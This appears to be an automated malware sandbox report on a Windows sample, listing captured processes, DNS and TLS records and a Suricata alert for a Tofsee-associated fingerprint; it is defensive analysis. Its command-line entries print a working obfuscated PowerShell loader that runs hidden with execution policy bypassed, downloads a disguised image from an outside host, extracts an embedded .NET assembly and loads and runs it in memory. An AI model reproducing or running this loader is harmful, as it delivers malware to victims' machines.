Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 27, 2023, 10:10 a.m. | Oct. 27, 2023, 10:12 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2164-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2280
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.27 |
uploaddeimagens.com.br | 104.21.45.138 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 172.67.215.45:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49166 172.67.215.45:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71 |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoç